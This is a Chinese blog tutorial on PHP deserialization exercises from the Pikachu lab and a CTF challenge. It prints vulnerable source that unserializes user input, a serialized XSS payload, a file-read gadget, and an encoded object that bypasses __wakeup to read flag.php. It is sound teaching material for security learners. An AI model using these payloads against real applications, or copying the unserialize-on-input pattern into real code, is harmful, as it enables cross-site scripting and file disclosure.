PHP反序列化之练习题

最新推荐文章于 2024-06-25 23:27:39 发布
最新推荐文章于 2024-06-25 23:27:39 发布
阅读量1.5k 收藏 4
点赞数 1
分类专栏: php php反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/110353379
版权

pikachu平台反序列化漏洞

第一题:反序列化漏洞输出XSS

地址:https://www.bihuoedu.com/vul/unserilization/unser.php

查看unser.php文件的源码: 

<?php
class S{
    var $test = "pikachu";
    function __construct(){
        echo $this->test;
    }
}
//O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
$html='';
if(isset($_POST['o'])){
    $s = $_POST['o'];
    if(!@$unser = unserialize($s)){
        $html.="<p>大兄弟,来点劲爆点儿的!</p>";
    }else{
        $html.="<p>{$unser->test}</p>";
    }

}
?>

构建反序列化字符串:O:1:"S":1:{s:4:"test";s:29:"<script>alert('shy')</script>";}

提交构建反序列化字符串:

源码当中的第64行输出了成员变量的值,因此造成了xss漏洞。

反序列化的对象无法调用构造函数。 

第二题:反序列化文件读取

地址:https://www.bihuoedu.com/vul/unserilization/readfile.php

// 当他的对象被输出时候,调用__toString
class FileClass{
public $filename = 'error.log';
// 返回读取一个文件的内容
public function __toString(){
return file_get_contents($this->filename);
}
}
class User{
public $age = 0;
public $name = '';
public function __toString(){
return "User $this->name is $this->age years old";
}
}
$obj = unserialize($_GET['user_serialize']);
echo $obj;
// 序列号 把对象转换成字节流
// serialize($obj)
// 反序列号 把字节流转换成对象
// unserialize($obj)

读取readfile.php文件

第三题 CTF题1

<?php
class SoFun{ 
    protected $file='index.php';
    function __destruct(){ 
      if(!empty($this->file)) {
       if(strchr($this-> file,"\\")===false &&  strchr($this->file, '/')===false)
          show_source(dirname (__FILE__).'/'.$this ->file);
       else      die('Wrong filename.');
      }
  }  
    function __wakeup(){ 
    	$this-> file='index.php'; 
    } 
    public function __toString(){
    	return '' ;
    }
}     
    if (!isset($_GET['file'])){
     show_source('index.php');
      } 
    else{ 
       $file=base64_decode( $_GET['file']); 
       echo unserialize($file );
        } 
?>   #<!--key in flag.php-->

源码分析:

  • 1,根据注释给的提示,key在flag.php文件当中。
  • 2,类SoFun中定义的析构函数可读取文件,文件名过滤了\\和/
  • 3,允许用户传入参数并进行反序列化
  • 4,反序化时会调用__wakeup()函数,给变量$file重新赋值index.php

解题思路:

绕过__wakeup()方法,在反序列化时不要调用__wakeup()方法。

关键点:

我们传入的序列化字符串中对象属性个数大于真实的对象属性个数的时候,就会跳过__wakeup()方法的执行。

直接访问:

根据提示直接访问flag.php,无法获取flag

根据之前源码分析结果,构建序列化字符串:O:5:"SoFun":2:{S:7:"\00*\00file";s:8:"flag.php";}

将序列化之后的字符串在网页中进行提交,要先进行base64编码和url编码:Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ%3d%3d

坑点:复现用的环境是PHP7 应该修复了这个绕过wakeup的方法,后门切换到PHP5的时候成功复现成功。

 

 

 

 

 

shy014
关注
专栏目录
CISP-PTE实操练习题讲解二(新版)
lza20001103的博客
08-06 7059
CISP-PTE实操练习题讲解二(新版)
PHP反序列化题目记录
BaiScorpio的博客
06-20 878
最近跑去看了下PHP反序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化、POP链反序列化和PHAR反序列化,以下将记录学习过程中的一些例题学习的过程。...
PHP反序列化入门题
ailx10
10-20 390
每一天都是新的一天,每一天都会接受新的信息,每一天都会有新的成长,昨天接到一个付费咨询,一直到晚上睡前才记起来,客户是一个大一学生,参加了大学的网络安全社团,然后遇到了一道题目,想求助我帮忙解决~这题考察的是PHP反序列化,还有对象的构造函数和析构函数,算是Web安全入门题,有兴趣和想法的小伙伴,可以在知乎平台购买Web安全三册,比京东便宜一点,本着助人为乐的精神,就帮助这位小兄弟分析一下~首先是...
CTF中的反序列化题目
最新发布
weixin_50372036的博客
06-25 745
其次是wakeup,wakeup只需要把序列化字串的对象属性个数1改为别的数字就行了,但是注意这里file 的类型是private,所以打印出来的串是有不可见字符%00的,不要复制出来自己base,不然结果就不一样了。方法有一个CVE漏洞,CVE-2016-7124,在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行,即当前函数中只有一个参数$flag,若传入的序列化字符串中的参数个数为2即可绕过。传入s中,就得到了执行phpinfo后的界面,完成了执行流程的改变。
PHP反序列化题目
Galaxy_fan的博客
10-01 898
百度杯十月场_Hash hash用Md5解密是kkkkkk01123 把123换成234,MD5加密 获得变量var,base64解密,正则匹配,如果匹配程序结束,否则反序列化变量var 为了得到f15g_is_here.php内容要绕过正则匹配和_wakeup方法。_wakeup有一个bug就是当序列化字符串中表示对象属性个数的值大于真是的属性个数是就会跳过_wakeup,然后绕过正则可以...
PHP反序列化练习
qwsn
11-19 2638
1、XCTF平台:https://adworld.xctf.org.cn/task 高阶:1.unserialize3 高阶:2.Web_php_unserialize 2、BUUCTF平台:https://buuoj.cn/challenges Web类:4.[安洵杯 2019]easy_serialize_php Web类:5.[ZJCTF 2019]NiZhuanSiWei Basic类:6.BUU CODE REVIEW 1 Web类:7.[网鼎杯 2020 青龙组]AreUSerialz Web类
两道反序列化例题
limenzzz的博客
05-03 1269
攻防世界: 1.Web_php_unserialize 先代码审计,发现定义了demo类,而在其中有一句 这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中,于是需要构造反序列化的demo类,且要绕过wake_up函数,根据上篇可知,只要输入的数据数少于规定的就可以绕过。于是需要构造 O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";} //原构造,未构建任何绕过 O:4:"demo":2:{s:10:"De
第二十二天php反序列化问题
代码审计
03-31 1916
序列化 百度百科上关于序列化的定义是, 将对象的状态信息转换为可以存储或传输的形式的过程。在序列化 期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对 象的状态,重新创建该对象。 简单的说,序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安 全的进行通信。 PHP中的序列化与反序列化 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一 旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没
php代码-ctf payload 第九题 反序列化 do you know robot
07-16
在CTF(Capture The Flag)竞赛中,编程者经常面临各种挑战,其中“反序列化”是常见的安全问题之一。本题"php代码-ctf payload 第九题 反序列化 do you know robot"显然是一个关于PHP反序列化漏洞利用的实战题目。...
PHP反序列化入门手把手详解
顶峰
02-08 1894
php
CTF竞赛入门基础——反序列化综合真题练习
# 1. CTF竞赛概述 CTF(Capture The Flag)竞赛是一种网络安全技能竞赛,旨在考察参赛者在网络安全领域的实战能力和解决问题的能力。参赛者需要通过解决一系列的难题来获取旗标(Flag),这些...## 1.2 反序列化在C
从一道CTF题学习PHP反序列化漏洞-附件资源
03-02
从一道CTF题学习PHP反序列化漏洞-附件资源
php反序列化题目
pwfortune的博客
04-07 1013
Start类 - __destruct ---> Sec类- __toString ---> Easy类 -__call ---> eeee类-__clone。可以发现在 Sec 类 中 使用了一个 check()方法,但是这个方法是不存在的,正好满足__call() 的条件,这又需要调用到。---> Start类- __isset ---> Sec 类- __invoke --->file_get_contents。方法,在对象中调用一个不可访问方法时,__call() 会被调用。
PHP反序列化刷题合集
2301_76690905的博客
11-20 393
第一步:确定切入点在于($this->func)($this->var);,给func传system,给var传ls /,如果执行的话就是system(‘ls /’)查根目录,那我们怎么执行呢?需要我们触发evil方法第二步:我们注意到pwn类中的$this->obj->evil();可以触发evil()方法,那我们就可以把实例化的web类传给pen类的obj属性,想要真正触发evil()还需要触发__invoke()魔术方法。__invoke会在一个对象被当做函数调用时触发。
PHP反序列化题目学习
2302_80044238的博客
02-17 1058
所以只要我们加一个未定义的属性即可绕过wakeup函数只需传入参数x=O:1:"X":2:{s:1:"x";}(X后的数字只要比1大即可)如图:解决!
序列化和反序列化的一个简单练习
qq_34787830的博客
05-04 470
using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 6664
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
PHP反序列化漏洞(最全面最详细有例题)
m0_73728268的博客
04-14 2890
详细讲解PHP反序列化漏洞的基本原理及利用,由简入精,深入浅出;包含Docker环境搭建,例题解析;类与对象简介;序列化与反序列化基础知识;魔术方法原理及利用;POP链构造及解析;字符串逃逸;session反序列化,phar反序列化等;
ctf php反序列化
06-07
CTF中的PHP反序列化攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击中,攻击者通常会在Cookie、GET或POST参数中注入恶意的序列化数据,然后通过触发漏洞来执行恶意代码或获取敏感信息。为了防止这种攻击,应用程序开发人员需要对输入进行严格的过滤和验证,并且尽可能避免使用反序列化功能。此外,还可以使用专门的安全框架来防止这种攻击,比如PHP的Suhosin扩展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值